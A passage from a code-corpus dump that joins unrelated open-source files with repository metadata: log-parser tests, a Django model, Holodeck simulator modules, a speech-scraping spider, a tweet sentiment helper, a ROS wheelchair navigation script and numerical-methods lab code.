assert result == [dict(b="b")] * 100
def test_greedy_pattern():
text = ("\n" + "a" * 100) * 1000
pattern = r"\n(?P<a>a+)"
with io.StringIO(text) as file:
result = list(logger.parse(file, pattern, chunk=30))
assert result == [dict(a="a" * 100)] * 1000
def test_cast_dict(tmpdir):
file = tmpdir.join("test.log")
file.write("[123] [1.1] [2017-03-29 11:11:11]\n")
regex = r"\[(?P<num>.*)\] \[(?P<val>.*)\] \[(?P<date>.*)\]"
caster = dict(num=int, val=float, date=lambda d: datetime.strptime(d, "%Y-%m-%d %H:%M:%S"))
result = next(logger.parse(str(file), regex, cast=caster))
assert result == dict(num=123, val=1.1, date=datetime(2017, 3, 29, 11, 11, 11))
def test_cast_function(tmpdir):
file = tmpdir.join("test.log")
file.write("[123] [1.1] [2017-03-29 11:11:11]\n")
regex = r"\[(?P<num>.*)\] \[(?P<val>.*)\] \[(?P<date>.*)\]"
def caster(groups):
groups["num"] = int(groups["num"])
groups["val"] = float(groups["val"])
groups["date"] = datetime.strptime(groups["date"], "%Y-%m-%d %H:%M:%S")
result = next(logger.parse(str(file), regex, cast=caster))
assert result == dict(num=123, val=1.1, date=datetime(2017, 3, 29, 11, 11, 11))
def test_cast_with_irrelevant_arg(tmpdir):
file = tmpdir.join("test.log")
file.write("[123] Blabla")
regex = r"\[(?P<a>\d+)\] .*"
caster = dict(a=int, b=float)
result = next(logger.parse(str(file), regex, cast=caster))
assert result == dict(a=123)
def test_cast_with_irrelevant_value(tmpdir):
file = tmpdir.join("test.log")
file.write("[123] Blabla")
regex = r"\[(?P<a>\d+)\] (?P<b>.*)"
caster = dict(a=int)
result = next(logger.parse(str(file), regex, cast=caster))
assert result == dict(a=123, b="Blabla")
@pytest.mark.parametrize("file", [object(), 123, dict])
def test_invalid_file(file):
with pytest.raises(ValueError):
next(logger.parse(file, r"pattern"))
@pytest.mark.parametrize("pattern", [object(), 123, dict])
def test_invalid_pattern(fileobj, pattern):
with pytest.raises(ValueError):
next(logger.parse(fileobj, pattern))
@pytest.mark.parametrize("cast", [object(), 123])
def test_invalid_cast(fileobj, cast):
with pytest.raises(ValueError):
next(logger.parse(fileobj, r"pattern", cast=cast))
``` |
{
"source": "joshgoshbgosh/ccs-final-project",
"score": 3
} |
#### File: ccs-final-project/accounts/models.py
```python
from django.db import models
from django.conf import settings
from django.contrib.auth.models import AbstractUser
class User(AbstractUser):
username = models.CharField(max_length=255)
class Profile(models.Model):
# https://docs.djangoproject.com/en/3.1/topics/db/examples/one_to_one/#one-to-one-relationships
user = models.OneToOneField(settings.AUTH_USER_MODEL, on_delete=models.CASCADE, related_name="profile", blank=True)
phone_number = models.CharField(max_length=12, blank=True)
def __str__(self):
return self.user.username
``` |
{
"source": "joshgreaves/Holodeck",
"score": 2
} |
#### File: Holodeck/holodeck/exceptions.py
```python
class HolodeckException(Exception):
"""HolodeckException.
Args:
message (str): The error string.
"""
def __init__(self, message):
super(HolodeckException, self).__init__(message)
```
#### File: Holodeck/holodeck/hyperparameters.py
```python
from holodeck.agents import *
class Hyperparameters:
"""This class contains an easy way of accessing the expected size of the hyperparameter array for an agent."""
_shape_dict = {
UavAgent: [27]
}
@staticmethod
def shape(agent_type):
"""Get the shape of the hyperparameter array for the specified agent"""
return Hyperparameters._shape_dict[agent_type] if agent_type in Hyperparameters._shape_dict else [1]
class UAVHyperparameters:
"""This class contains the indices of the UAV's hyperparameters
The variables appended with a P, I, or D apply to the proportional, integral, and derivative part of the internal
PID controller of the UAV. The variables with TAU are the "Process Time Constants" - the value that we calculated
(admittedly imperfectly) to be the amount of time (in seconds) for the UAV to reach 63.2% of its output in the
respective aspect. Changing Tau will cause overshooting the target or arriving late to the target, depending.
"""
NUMBER_OF_ELEMENTS = 0 # this is the first item in the buffer, not the actual number of elements
UAV_MASS = 1
UAV_MU = 2
UAV_MAX_ROLL = 3
UAV_MAX_PITCH = 4
UAV_MAX_YAW_RATE = 5
UAV_MAX_FORCE = 6
UAV_TAU_UP_ROLL = 7
UAV_TAU_UP_PITCH = 8
UAV_TAU_UP_YAW_RATE = 9
UAV_TAU_UP_FORCE = 10
UAV_TAU_DOWN_ROLL = 11
UAV_TAU_DOWN_PITCH = 12
UAV_TAU_DOWN_YAW_RATE = 13
UAV_TAU_DOWN_FORCE = 14
UAV_ROLL_P = 15
UAV_ROLL_I = 16
UAV_ROLL_D = 17
UAV_PITCH_P = 18
UAV_PITCH_I = 19
UAV_PITCH_D = 20
UAV_YAW_P = 21
UAV_YAW_I = 22
UAV_YAW_D = 23
UAV_ALT_P = 24
UAV_ALT_I = 25
UAV_ALT_D = 26
```
#### File: Holodeck/holodeck/sensors.py
```python
import numpy as np
class Sensors:
"""Class information of sensor data with mappings from names to corresponding numbers
Attributes:
TERMINAL (int): Index for terminal sensor output. Value is 1.
REWARD (int): Index for reward sensor output. Value is 2.
PRIMARY_PLAYER_CAMERA (int): Deprecated. Index for primary player camera sensor. Value is 3.
PIXEL_CAMERA (int): Index for pixel camera sensor. Value is 4.
ORIENTATION_SENSOR (int): Index for orientation sensor. Value is 5.
IMU_SENSOR (int): Index for IMU sensor. Value is 6.
JOINT_ROTATION_SENSOR (int): Index for joint rotation sensor. Value is 7.
RELATIVE_SKELETAL_POSITION_SENSOR (int): Index for relative skeletal position sensor. Value is 8.
LOCATION_SENSOR (int): Index for location sensor. Value is 9.
VELOCITY_SENSOR (int): Index for velocity sensor. Value is 10.
ROTATION_SENSOR (int): Index for rotation sensor. Value is 11.
COLLISION_SENSOR (int): Index for collision sensor. Value is 12.
PRESSURE_SENSOR (int): Index for pressure sensor. Value is 13.
"""
TERMINAL = 1
REWARD = 2
PRIMARY_PLAYER_CAMERA = 3 # default is 512 x 512 RGBA
PIXEL_CAMERA = 4 # default is 512 x 512 RGBA
ORIENTATION_SENSOR = 5
IMU_SENSOR = 6
JOINT_ROTATION_SENSOR = 7
RELATIVE_SKELETAL_POSITION_SENSOR = 8
LOCATION_SENSOR = 9
VELOCITY_SENSOR = 10
ROTATION_SENSOR = 11
COLLISION_SENSOR = 12
PRESSURE_SENSOR = 13
# Sizes are the number of entries in the numpy array
_shape_dict = {
TERMINAL: [1],
REWARD: [1],
PRIMARY_PLAYER_CAMERA: [512, 512, 4],
PIXEL_CAMERA: [256, 256, 4],
ORIENTATION_SENSOR: [3, 3],
IMU_SENSOR: [2, 3],
JOINT_ROTATION_SENSOR: [94],
RELATIVE_SKELETAL_POSITION_SENSOR: [67, 4],
LOCATION_SENSOR: [3],
VELOCITY_SENSOR: [3],
ROTATION_SENSOR: [3],
COLLISION_SENSOR: [1],
PRESSURE_SENSOR: [48*(3+1)],
}
_type_dict = {
TERMINAL: np.bool,
REWARD: np.float32,
PRIMARY_PLAYER_CAMERA: np.uint8,
PIXEL_CAMERA: np.uint8,
ORIENTATION_SENSOR: np.float32,
IMU_SENSOR: np.float32,
JOINT_ROTATION_SENSOR: np.float32,
RELATIVE_SKELETAL_POSITION_SENSOR: np.float32,
LOCATION_SENSOR: np.float32,
VELOCITY_SENSOR: np.float32,
ROTATION_SENSOR: np.float32,
COLLISION_SENSOR: np.bool,
PRESSURE_SENSOR: np.float32,
}
_name_dict = {
TERMINAL: "Terminal",
REWARD: "Reward",
PRIMARY_PLAYER_CAMERA: "PrimaryPlayerCamera",
PIXEL_CAMERA: "PixelCamera",
ORIENTATION_SENSOR: "OrientationSensor",
IMU_SENSOR: "IMUSensor",
JOINT_ROTATION_SENSOR: "JointRotationSensor",
RELATIVE_SKELETAL_POSITION_SENSOR: "RelativeSkeletalPositionSensor",
LOCATION_SENSOR: "LocationSensor",
VELOCITY_SENSOR: "VelocitySensor",
ROTATION_SENSOR: "RotationSensor",
COLLISION_SENSOR: "CollisionSensor",
PRESSURE_SENSOR: "PressureSensor"
}
_reverse_name_dict = {v: k for k, v in _name_dict.items()}
@staticmethod
def shape(sensor_type):
"""Gets the shape of a particular sensor.
Args:
sensor_type (int): The type of the sensor.
Returns:
List of int: The shape of the sensor data.
"""
return Sensors._shape_dict[sensor_type] if sensor_type in Sensors._shape_dict else None
@staticmethod
def name(sensor_type):
"""Gets the human readable name for a sensor.
Args:
sensor_type (int): The type of the sensor.
Returns:
str: The name of the sensor.
"""
return Sensors._name_dict[sensor_type] if sensor_type in Sensors._name_dict else None
@staticmethod
def dtype(sensor_type):
"""Gets the data type of the sensor data (the dtype of the numpy array).
Args:
sensor_type (int): The type of the sensor.
Returns:
type: The type of the sensor data.
"""
return Sensors._type_dict[sensor_type] if sensor_type in Sensors._type_dict else None
@staticmethod
def name_to_sensor(sensor_name):
"""Gets the index value of a sensor from its human readable name.
Args:
sensor_name (str): The human readable name of the sensor.
Returns:
int: The index value for the sensor.
"""
return Sensors._reverse_name_dict[sensor_name] if sensor_name in Sensors._reverse_name_dict else None
@staticmethod
def set_primary_cam_size(height, width):
"""Sets the primary camera size for this world. Should only be called by environment.
Args:
height (int): New height value.
width (int): New width value.
"""
Sensors._shape_dict[Sensors.PRIMARY_PLAYER_CAMERA] = [height, width, 4]
@staticmethod
def set_pixel_cam_size(height, width):
"""Sets the pixel camera size for this world. Should only be called by Environment.
Args:
height (int): New height value.
width (int): New width value.
"""
Sensors._shape_dict[Sensors.PIXEL_CAMERA] = [height, width, 4]
def __init__(self):
print("No point in instantiating an object.")
```
#### File: Holodeck/holodeck/util.py
```python
import math
import os
try:
unicode # Python 2
except NameError:
unicode = str # Python 3
def get_holodeck_path():
"""Gets the path of the holodeck environment
Returns:
(str): path to the current holodeck environment
"""
if "HOLODECKPATH" in os.environ and os.environ["HOLODECKPATH"] != "":
return os.environ["HOLODECKPATH"]
if os.name == "posix":
return os.path.expanduser("~/.local/share/holodeck")
elif os.name == "nt":
return os.path.expanduser("~\\AppData\\Local\\holodeck")
else:
raise NotImplementedError("holodeck is only supported for Linux and Windows")
def convert_unicode(value):
"""Resolves python 2 issue with json loading in unicode instead of string
Args:
value (str): Unicode value to be converted
Returns:
(str): converted string
"""
if isinstance(value, dict):
return {convert_unicode(key): convert_unicode(value)
for key, value in value.iteritems()}
elif isinstance(value, list):
return [convert_unicode(item) for item in value]
elif isinstance(value, unicode):
return value.encode('utf-8')
else:
return value
def get_os_key():
"""Gets the key for the OS.
Returns:
str: "Linux" or "Windows". Throws NotImplementedError for other systems.
"""
if os.name == "posix":
return "Linux"
elif os.name == "nt":
return "Windows"
else:
raise NotImplementedError("holodeck is only supported for Linux and Windows")
def human_readable_size(size_bytes):
"""Gets a number of bytes as a human readable string.
Args:
size_bytes (int): The number of bytes to get as human readable.
Returns:
str: The number of bytes in a human readable form.
"""
if size_bytes == 0:
return "0B"
size_name = ("B", "KB", "MB", "GB", "TB", "PB", "EB", "ZB", "YB")
i = int(math.floor(math.log(size_bytes, 1024)))
p = math.pow(1024, i)
s = round(size_bytes / p, 2)
return "%s %s" % (s, size_name[i])
``` |
{
"source": "josh-gree/conf_speeches",
"score": 3
} |
#### File: SOU/spiders/SOU_spider.py
```python
import scrapy
from SOU.items import SouItem
from bs4 import BeautifulSoup
class SOUSpider(scrapy.Spider):
name = "souspider"
allowed_domains = ["stateoftheunion.onetwothree.net"]
start_urls = ("http://stateoftheunion.onetwothree.net/texts/index.html",)
def parse(self, response):
links = map(response.urljoin,response.css('a::attr(href)')[5:-2].extract())
for link in links:
yield scrapy.Request(link,callback=self.extract_speech)
def extract_speech(self,response):
text = ''.join(response.css('p').extract())
text = BeautifulSoup(text).text.replace("\n"," ")
speaker = response.css('h2::text').extract()[0]
date = int(response.css('h3::text').extract()[0].split()[-1])
item = SouItem()
item['text'] = text
item['speaker'] = speaker
item['date'] = date
yield item
``` |
{
"source": "josh-gree/debatesnlp",
"score": 3
} |
#### File: src/data/helper_functions.py
```python
from itertools import islice
from numpy import array, nan
import pandas as pd
from tempfile import NamedTemporaryFile
import preprocessor as p
import re
import subprocess
def try_extract(d,field):
try:
return d[field]
except Exception:
return None
def chunker(iterable, n):
iterable = iter(iterable)
count = 0
group = []
while True:
try:
group.append(iterable.next())
count += 1
if count % n == 0:
yield group
group = []
except StopIteration:
yield group
break
def extract_name(d):
if d[3] != None:
return d[3]['full_name']
else:
return None
def extract_centroid(d):
if d[3] != None:
return array(d[3]['bounding_box']['coordinates']).mean(axis=1)[0]
else:
return None
def make_df(data_chunk,i,base_fname):
fname = '../../data/processed/{}_{}.csv'.format(base_fname,i)
coords = [extract_centroid(d) for d in data_chunk]
place_names = [extract_name(d) for d in data_chunk]
tweets = [d[0] for d in data_chunk]
dates = [pd.to_datetime(int(d[1])*1000000) for d in data_chunk]
data_chunk = {'coord':coords,'place_name':place_names,'tweet':tweets,'date':dates}
df = pd.DataFrame(data_chunk)
df = df.drop_duplicates(subset=['tweet'])
df = df.fillna(value=nan)
df['long'] = df.iloc[:,0].map(lambda x : x[0],na_action='ignore')
df['lat'] = df.iloc[:,0].map(lambda x : x[1],na_action='ignore')
df = df.drop('coord',axis=1)
regex = re.compile('[\.\t\,\:;\(\)\.\?\*\%\'\!\+\"]')
df.tweets = df.tweet.map(lambda x : x.encode('utf-8').strip())
df['cleaned_tweet'] = df.tweets.map(p.clean)
df['cleaned_tweet'] = df.cleaned_tweet.map(lambda x : regex.sub('',x).lower())
df = df.reset_index()
df = df.drop('index',axis=1)
t1 = NamedTemporaryFile()
t2 = NamedTemporaryFile()
t3 = NamedTemporaryFile()
df.tweet.to_csv(t1.name,encoding='utf-8',index=False)
df.cleaned_tweet.to_csv(t2.name,encoding='utf-8',index=False)
subprocess.call('curl --data-binary @{} "http://www.sentiment140.com/api/bulkClassify" > {}'.format(t1.name,t3.name),shell=True)
pols = pd.read_csv(t3.name,header=None)
df['polarity'] = pols[0]
subprocess.call('curl --data-binary @{} "http://www.sentiment140.com/api/bulkClassify" > {}'.format(t2.name,t3.name),shell=True)
pols = pd.read_csv(t3.name,header=None)
df['polarity_cl'] = pols[0]
t1.close()
t2.close()
t3.close()
df.to_csv(fname,encoding='utf-8')
``` |
{
"source": "joshgreen5157/ros_wheelchair",
"score": 2
} |
#### File: Robotics Code 2021/scripts/rviz_nav.py
```python
import os
import time
import rospy
import serial
import pickle
import actionlib
import subprocess as sp
import multiprocessing as mp
from std_msgs.msg import String
from geometry_msgs.msg import PoseStamped,Twist, PoseWithCovarianceStamped, Pose2D
from actionlib_msgs.msg import GoalStatusArray
from move_base_msgs.msg import MoveBaseAction
# Launch ROS process
def ROSProcess():
sp.run('roslaunch navigation hector_map.launch', shell = True, check = True, stdout = sp.PIPE, stderr = sp.STDOUT)
# Establish serial communication with external device
def setupComPort(comPort):
serialPort = serial.Serial(port = comPort, baudrate = 9600, bytesize=8, timeout=2, stopbits=serial.STOPBITS_ONE)
return serialPort
# Create necessary global variables
COM = setupComPort("/dev/ttyACM0")
serialCounter = 0
cancelBool = False
freeze = "False"
# Clear the map on rViz (NOT CURRENTLY IN USE, IF USED ALLOW TIME FOR MAP TO REPOPULATE)
def clearMap():
print("Clearing MAP")
clear_publisher = rospy.Publisher("syscommand", String, queue_size=5)
msg = "reset"
clear_publisher.publish(msg)
# send a new target goal to rViz (NOT CURRENTLY IN USE)
def setGoal(msg):
goal_publisher = rospy.Publisher("move_base_simple/goal", PoseStamped, queue_size=5)
goal = PoseStamped()
if msg.pose != goal.pose:
writeCommand(COM, 'a')
goal.header.seq = 1
goal.header.frame_id = "map"
goal.header.stamp = rospy.Time.now()
goal.pose = msg.pose
goal_publisher.publish(goal)
time.sleep(2)
# Translate the desired command and assign it the proper numeric value
def translateCommands(target):
global COM
lineA = float(target.linear.x)
lineB = float(target.angular.z)
if lineA> 0:
lineA = lineA+210
elif lineA< 0:
lineA = lineA+100
elif lineA == 0:
lineA = 135
if lineB> 0:
lineB = lineB+155
elif lineB< 0:
lineB = lineB+112
elif lineB == 0:
lineB = lineB+135
lineA = 'A' + str(int(lineA))
lineB = 'B' + str(int(lineB))
print('x = ',target.linear.x,'a = ', lineA)
print('y = ',target.angular.z,'b = ', lineB)
writeCommand(COM, lineA)
writeCommand(COM, lineB)
# Format the desired command and send it over the open COM port
def writeCommand(comPort, strvar):
comPort.write(str.encode(strvar + '*'))
# Translate and send velocity commands received from rViz, flush serial line every 25 messages sent to prevent overloading
def navCommandsReceived(poses):
global COM
global freeze
global serialCounter
if freeze == "False":
translateCommands(poses)
if serialCounter == 25:
COM.flushInput()
COM.flushOutput()
serialCounter = 0
serialCounter = serialCounter+1
# When new target goal is reached, send an 'a' command to put the wheelchair in autonomous mode
def newGoalReceived(target):
global COM
global cancelBool
cancelBool = True
writeCommand(COM,'a')
time.sleep(.5)
writeCommand(COM,'a')
# When Target location is reach send a DONE command and clear the goal from Rviz
def targetReached(status):
global COM
global cancelBool
if status.status_list != []:
if status.status_list[0].status == 3 and cancelBool == True:
print('Target reached')
writeCommand(COM, 'DONE')
move_base = actionlib.SimpleActionClient('/servicebot/move_base', MoveBaseAction)
move_base.cancel_all_goals()
cancelBool = False
# Check the camera output for Wheelchair Freeze command
def checkCamera(pose):
global freeze
global COM
if os.path.getsize("/home/max/shared.pkl") > 0:
fp = open("/home/max/shared.pkl", "rb")
freeze = pickle.load(fp)
if freeze == "True":
print('checkCamera ', freeze)
stopWheelchair()
# Send Stop command to wheelchair
def stopWheelchair():
global COM
writeCommand(COM, 'A135')
writeCommand(COM, 'B135')
# Looping listener for ROS Topics
def listener():
global freeze
rospy.init_node('listener',anonymous=True)
rospy.Subscriber('/pose2D', Pose2D, checkCamera)
rospy.Subscriber('/move_base_simple/goal', PoseStamped, newGoalReceived)
rospy.Subscriber('/cmd_vel', Twist, navCommandsReceived)
rospy.Subscriber('/move_base/status', GoalStatusArray, targetReached)
rospy.spin()
# Launch ROS and rVIZ, start listener process
def main():
p = mp.Process(target=ROSProcess)
p.start()
time.sleep(10)
l = mp.Process(target=listener)
l.start()
# sp.run('mark3.py', shell = True, check = True, stdout = sp.PIPE, stderr = sp.STDOUT)
time.sleep(5)
print('Ready for target location')
p.join()
l.join()
if __name__ == '__main__':
print('Start navigation script')
main()
``` |
{
"source": "JoshGreenslade/Flowers",
"score": 2
} |
#### File: Flowers/models/flower_generator.py
```python
import joblib
import numpy as np
from PIL import Image
from keras.models import load_model
import keras
import os
import hashlib
print('agrg?')
class FlowerGen():
def __init__(self):
self.generator = load_model('./models/saved_models/DCGAN_V1.h5')
self.clf = joblib.load('./models/saved_models/refiner_SVC.joblib')
self.noise = np.random.normal(loc=0,scale=1,size=(1,100))
self.lasthash = None
self.get_new_noise()
self.gen_new_image()
def get_new_noise(self):
self.noise = np.random.normal(loc=0,scale=1,size=(1,100))
while self.clf.predict_proba(self.noise)[0,1] < 0.5:
self.noise = np.random.normal(loc=0,scale=1,size=(1,100))
def gen_new_image(self):
img = self.generator.predict(self.noise)[0] * 0.5 + 0.5
image = Image.fromarray((img*255).astype('uint8'))
md5hash = hashlib.md5(image.tobytes()).hexdigest()
image.save(f'./static/images/{md5hash}.png')
if self.lasthash is not None:
os.remove(f'./static/images/{self.lasthash}.png')
else:
pass
self.lasthash = md5hash
self.get_new_noise()
return f'images/{self.lasthash}.png'
if __name__ == '__main__':
flowergen = FlowerGen()
flowergen.gen_new_image()
flowergen.gen_new_image()
``` |
{
"source": "josh-gree/NumericalMethods",
"score": 3
} |
#### File: NumericalMethods/Labs/lab1_convergence.py
```python
import numpy
from matplotlib import pyplot
from lab1_integral_7 import integral
def f_2(x):
return numpy.sqrt(1.0-x**2)
I_2_exact = numpy.pi/4
Nstrips_all = 2**numpy.arange(10, 20)
widths = 1.0 / Nstrips_all
errors = numpy.zeros_like(widths)
for i, Nstrips in enumerate(Nstrips_all):
I_2_approx = integral(f_2, Nstrips)
errors[i] = abs(I_2_exact - I_2_approx)
pyplot.loglog(widths, errors, marker='x', label = r"$I_2$")
pyplot.ylabel("Error")
pyplot.xlabel("Strip width")
pyplot.legend(loc="upper left")
pyplot.show()
```
#### File: NumericalMethods/Labs/lab1_integral_2.py
```python
import lab1_integral1
def integral_4(Nstrips):
"""
The first integral: integrate x between 0 and 1.
"""
width = 1/Nstrips
integral = 0
for point in range(Nstrips):
height = (point / Nstrips)
integral = integral + width * height
return integral
def integral_total(Nstrips):
"""
The total integral.
"""
return integral_4(Nstrips) + lab1_integral1.integral_1(Nstrips)
print("Total using one hundred strips:", integral_total(100))
```
#### File: NumericalMethods/Labs/lab1_integral4.py
```python
def f_x_squared(x):
"""
Square the input
"""
return x**2
def integral_2(f, Nstrips):
"""
The general integral: f(x) between 0 and 1.
"""
width = 1/Nstrips
integral = 0
for point in range(Nstrips):
location = point / Nstrips
height = f(location)
integral = integral + width * height
return integral
```
#### File: tex/codes/bisection.py
```python
import numpy
def bisection(f, interval, eps_abs = 1e-10, max_step = 100):
"""
Use bisection to find x such that f(x) = 0.
"""
x_lo, x_hi = interval
x = (x_lo + x_hi) / 2.0
f_lo = f(x_lo)
if (abs(f_lo) < eps_abs):
return x_lo
f_hi = f(x_hi)
if (abs(f_hi) < eps_abs):
return x_hi
#assert(f_lo*f_hi < 0), "f(Endpoints) must change sign!"
if f_lo*f_hi > 0:
print("Warning! f(endpoints) have same sign!")
f_mid = f(x)
step = 0
while (step < max_step) and abs(f_mid) > eps_abs:
step += 1
if f_lo * f_mid < 0.0:
x_hi = x
f_hi = f(x_hi)
else:
x_lo = x
f_lo = f(x_lo)
x = (x_lo + x_hi) / 2.0
f_mid = f(x)
return x
if __name__ == "__main__":
def f(x):
return numpy.exp(x) + x - 2
def g(x):
return numpy.sin(x**2) - 0.1 * x
interval = [0, 1]
s = bisection(f, interval)
print("s = {}, f(s) = {}".format(s, f(s)))
for lower in range(1,9):
interval = [lower, 10]
try:
s = bisection(g, interval)
print("interval = [{}, 10], s = {}, g(s) = {}".format(lower, s, g(s)))
except:
pass
```
#### File: tex/codes/lecture14.py
```python
import numpy
from matplotlib import pyplot
def forward_difference(f, x0, h):
return (f(x0+h) - f(x0)) / h
def backward_difference(f, x0, h):
return (f(x0) - f(x0-h)) / h
def central_difference(f, x0, h):
return (f(x0+h) - f(x0-h)) / (2*h)
def euler(f, x_end, y0, N):
x, dx = numpy.linspace(0, x_end, N+1, retstep=True)
y = numpy.zeros((len(y0),N+1))
y[:,0] = y0
for n in range(N):
y[:,n+1] = y[:,n] + dx * f(x[n], y[:,n])
return x, dx, y
if __name__=="__main__":
h = 0.5
print("Forward difference, h=",h, "y'=",
forward_difference(numpy.exp, 0, h))
print("Backward difference, h=",h, "y'=",
backward_difference(numpy.exp, 0, h))
print("Central difference, h=",h, "y'=",
central_difference(numpy.exp, 0, h))
h = 0.05
print("Forward difference, h=",h, "y'=",
forward_difference(numpy.exp, 0, h))
print("Backward difference, h=",h, "y'=",
backward_difference(numpy.exp, 0, h))
print("Central difference, h=",h, "y'=",
central_difference(numpy.exp, 0, h))
h_all = 0.5/2**numpy.arange(1,10)
errors_forward = numpy.zeros_like(h_all)
errors_backward = numpy.zeros_like(h_all)
errors_central = numpy.zeros_like(h_all)
for i, h in enumerate(h_all):
errors_forward[i] = abs(1 - forward_difference(numpy.exp, 0, h))
errors_backward[i] = abs(1 - backward_difference(numpy.exp, 0, h))
errors_central[i] = abs(1 - central_difference(numpy.exp, 0, h))
pyplot.figure(figsize=(12,6))
pyplot.loglog(h_all, errors_forward, 'kx', label="Forward")
pyplot.loglog(h_all, errors_backward, 'bo', label="Backward")
pyplot.loglog(h_all, errors_central, 'r^', label="Central")
pyplot.loglog(h_all, h_all/h_all[0]*errors_forward[0], 'b-',
label=r"$\propto h$")
pyplot.loglog(h_all, (h_all/h_all[0])**2*errors_central[0], 'g-',
label=r"$\propto h^2$")
pyplot.xlabel(r"$h$")
pyplot.ylabel("Error")
pyplot.legend(loc="upper left")
pyplot.show()
def f_sin(x, y):
return -numpy.sin(x)
print("Euler's Method")
x, dx, y = euler(f_sin, 0.5, [1], 5)
print("dx=", dx, "y(0.5)=", y[0,-1])
x, dx, y = euler(f_sin, 0.5, [1], 50)
print("dx=", dx, "y(0.5)=", y[0,-1])
Npoints = 5*2**numpy.arange(1,10)
dx_all = 0.5/Npoints
errors = numpy.zeros_like(dx_all)
for i, N in enumerate(Npoints):
x, dx, y = euler(f_sin, 0.5, [1], N)
errors[i] = abs(y[0,-1] - numpy.cos(0.5))
dx_all[i] = dx
pyplot.figure(figsize=(12,6))
pyplot.loglog(dx_all, errors, 'kx')
pyplot.loglog(dx_all, errors[0]*(dx_all/dx_all[0])**1, 'b-',
label=r"$\propto \Delta x$")
pyplot.legend(loc='upper left')
pyplot.xlabel(r"$\Delta x$")
pyplot.ylabel("Error")
pyplot.show()
def f_circle(x, y):
dydx = numpy.zeros_like(y)
dydx[0] = -y[1]
dydx[1] = y[0]
return dydx
y0 = numpy.array([1, 0])
x, dx, y = euler(f_circle, 50, y0, 500)
pyplot.figure(figsize=(8,8))
pyplot.plot(y[0,:], y[1,:])
pyplot.show()
x, dx, y = euler(f_circle, 50, y0, 5000)
pyplot.figure(figsize=(8,8))
pyplot.plot(y[0,:], y[1,:])
pyplot.show()
```
#### File: tex/codes/lecture18.py
```python
import numpy
from matplotlib import pyplot
def euler_pc(f, x_end, y0, N):
x, dx = numpy.linspace(0, x_end, N+1, retstep=True)
y = numpy.zeros((len(y0),N+1))
y[:,0] = y0
for n in range(N):
fn = f(x[n], y[:,n])
yp = y[:,n] + dx * fn
y[:,n+1] = y[:,n] + dx / 2 * (fn + f(x[n+1], yp))
return x, dx, y
def ab2(f, x_end, y0, N):
x, dx = numpy.linspace(0, x_end, N+1, retstep=True)
y = numpy.zeros((len(y0),N+1))
fn = numpy.zeros((len(y0),N+1))
y[:,0] = y0
fn[:,0] = f(x[0], y[:,0])
x_epc, dx_epc, y_epc = euler_pc(f, dx, y0, 1)
y[:,1] = y_epc[:,1]
for n in range(1,N):
fn[:,n] = f(x[n], y[:,n])
y[:,n+1] = y[:,n] + dx * (3 * fn[:,n] - fn[:,n-1]) / 2
return x, dx, y
def milne(f, x_end, y0, N):
x, dx = numpy.linspace(0, x_end, N+1, retstep=True)
y = numpy.zeros((len(y0),N+1))
fn = numpy.zeros((len(y0),N+1))
y[:,0] = y0
fn[:,0] = f(x[0], y[:,0])
x_epc, dx_epc, y_epc = euler_pc(f, dx, y0, 1)
y[:,1] = y_epc[:,1]
for n in range(1,N):
fn[:,n] = f(x[n], y[:,n])
yp = y[:,n] + dx * (3 * fn[:,n] - fn[:,n-1]) / 2 #AB2 predictor
fp = f(x[n+1], yp)
y[:,n+1] = y[:,n-1] + dx * (fp + 4 * fn[:,n] + fn[:,n-1]) / 3
return x, dx, y
if __name__=="__main__":
def f_exp(x, y):
return -y
x, dx, y_ab2 = ab2(f_exp, 30, [1], 3000)
pyplot.figure(figsize=(12,6))
pyplot.plot(x, y_ab2[0,:])
pyplot.ylim(-1.1,1.1)
pyplot.xlabel(r"$x$")
pyplot.ylabel("<NAME>")
pyplot.show()
x, dx, y_milne = milne(f_exp, 30, [1], 3000)
pyplot.figure(figsize=(12,6))
pyplot.plot(x, y_milne[0,:])
pyplot.ylim(-1.1,1.1)
pyplot.xlabel(r"$x$")
pyplot.ylabel("Milne")
pyplot.show()
```
#### File: tex/codes/lecture20.py
```python
import numpy
import matplotlib
from matplotlib import pyplot
from scipy.optimize import fsolve
matplotlib.rcParams.update({'font.size':18, 'figure.figsize':(10,6)})
def relax_dirichlet(p, q, f, interval, bcs, N):
x, dx = numpy.linspace(interval[0], interval[1], N+2, retstep=True)
x_interior = x[1:-1]
A = numpy.zeros((N,N))
F = numpy.zeros((N,))
y = numpy.zeros((N+2,))
for i in range(N):
A[i,i] = dx**2 * q(x_interior[i]) - 2
if i>0:
A[i,i-1] = 1 - dx/2 * p(x_interior[i])
if i<N-1:
A[i,i+1] = 1 + dx/2 * p(x_interior[i])
F[i] = dx**2 * f(x_interior[i])
F[0] = F[0] - bcs[0] * (1 - dx/2 * p(x_interior[0]))
F[-1] = F[-1] - bcs[-1] * (1 + dx/2 * p(x_interior[-1]))
y_interior = numpy.linalg.solve(A, F)
y[0] = bcs[0]
y[1:-1] = y_interior
y[-1] = bcs[-1]
return x, y
def relax_blackbox(f, bcs, N):
x, dx = numpy.linspace(0, 1, N+2, retstep=True)
def residual(y):
y[0] = bcs[0]
y[-1] = bcs[-1]
dy = (y[2:] - y[:-2]) / (2*dx)
res = numpy.zeros_like(y)
res[1:-1] = y[:-2] + y[2:] - 2*y[1:-1] - dx**2 * f(x[1:-1], y[1:-1], dy)
return res
y_initial = numpy.zeros_like(x)
y = fsolve(residual, y_initial)
return x, y
def relax_newton(f, dfdy, dfddy, bcs, N):
x, dx = numpy.linspace(0, 1, N+2, retstep=True)
y = numpy.zeros_like(x)
y_old = numpy.ones_like(x)
step = 0
while numpy.linalg.norm(y-y_old) > 1e-10 and step < 100:
y_old = y.copy()
step = step + 1
y[0] = bcs[0]
y[-1] = bcs[-1]
x_interior = x[1:-1]
y_interior = y[1:-1]
dy = (y[2:] - y[:-2]) / (2*dx)
residual = y[:-2] + y[2:] - 2*y[1:-1] - dx**2 * f(x[1:-1], y[1:-1], dy)
J = numpy.zeros((N,N))
for i in range(N):
J[i,i] = -2 - dx**2*dfdy(x_interior[i], y_interior[i], dy[i])
if i>0:
J[i,i-1] = 1 + dx/2*dfddy(x_interior[i], y_interior[i], dy[i])
if i<N-1:
J[i,i+1] = 1 - dx/2*dfddy(x_interior[i], y_interior[i], dy[i])
y_new_interior = y_interior + numpy.linalg.solve(J, -residual)
y[1:-1] = y_new_interior
return x, y
if __name__=="__main__":
def p(x):
return numpy.ones_like(x)
def q(x):
return numpy.zeros_like(x)
def f(x):
return -numpy.ones_like(x)
x_exact = numpy.linspace(0, 1, 1000)
x, y = relax_dirichlet(p, q, f, [0, 1], [0, 1], 5)
